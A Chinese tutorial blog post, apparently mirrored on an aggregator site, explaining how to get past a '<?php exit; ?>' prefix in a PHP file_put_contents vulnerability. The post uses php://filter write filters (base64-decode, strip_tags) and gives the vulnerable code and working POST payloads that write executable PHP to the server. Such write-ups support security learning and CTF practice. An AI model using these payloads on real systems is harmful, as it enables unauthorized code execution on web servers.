当前位置: 首页 > news >正文

RCE编码绕过--php://filter妙用

目录

代码

如何绕过

payload构造


代码

<?php
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'],$content); 

当你想要输入代码的时候前面会有<?php exit;?>;,代码没有办法执行下去,所以我们要想办法绕过

如何绕过

我们可以尝试使用php://filter/write=convert.base64-decode/resource=abc.php,在写入文件的时候对文件进行解码,然后我们后面POST传参的时候可以传一个base64编码,然后php://file解码的时候会将前面的<?php exit;?>解码成别的字符,然后将你输入的base64编码解码成原来的字符

<?php phpinfo();的编码

PD9waHAgcGhwaW5mbygpOw==

抓包提交参数,所提交的txt前面需要加一个a,这个的原因是base是4位一解码,txt前面加a是用来给<?php exit; ?>补位的

payload构造

txt=aPD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=convert.base64-decode/resource=abc.php

看一下我们的文件路径,多出一个abc.php文件且前面的<?php exit; ?>被编码成乱码了,然后后面的php代码就可以执行了

php://filter还有别的标签string.strip_tags,这个标签可以从字符串中去除 HTML 和 PHP 标记。

然后我们可以传一个base64的编码然后先去除,<?php exit; ?>标签然后再解码,php://filter可以使用多个过滤器

如下,这里txt前面就没有了a

txt=PD9waHAgcGhwaW5mbygpOw==
filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=abc.php

结果 

http://www.lryc.cn/news/430011.html

相关文章:

  • FactoryBean 与 BeanFactory
  • 【迅为RK3568开发板】OpenHarmony学习开发系列教程(第2期 南向基础篇一)
  • 编程修炼之Hibernate--- springboot启动初始化ddl过程与如何自定义修改 table 字段长度
  • TOMCAT入门到精通
  • Android笔试面试题AI答之Kotlin(18)
  • Linux基础知识学习(五)
  • 股票买卖的思路与代码
  • Eureka Server与Eureka Client详解:服务注册与发现的交互机制
  • php-fpm 如何查看哪个正在执行死循环 并终止
  • 电脑硬盘坏了怎么恢复数据?
  • cdga|某大型企业数据治理的成功转型:构建数据驱动的竞争力新引擎
  • C#使用 ModeBusTCP读取汇川Easy521PLC
  • PostgreSQL的postgres主进程
  • Java实现K个排序链表的高效合并:逐一合并、分治法与优先队列详解
  • Xinstall揭秘:高效App推广背后的黑科技
  • 星巴克VS瑞幸,新王、旧王之争给新CEO带来哪些启示
  • C语言 | Leetcode C语言题解之第354题俄罗斯套娃信封问题
  • 大型俄罗斯国际展览会介绍
  • CST软件仿真案例:圆极化平板天线仿真02
  • 【前端】vue监视属性和计算属性对比
  • 探索提示工程 Prompt Engineering的奥妙
  • 算法阶段总结1
  • 前端宝典之七:React性能优化实战精华篇
  • 【Dash】feffery_antd_components 简单入门示例
  • JAVA学习-练习试用Java实现“路径交叉”
  • element组件封装
  • Mysql (面试篇)
  • 【python】深入探讨python中的抽象类,创建、实现方法以及应用实战
  • 微前端传值
  • 《学会 SpringBoot · 依赖管理机制》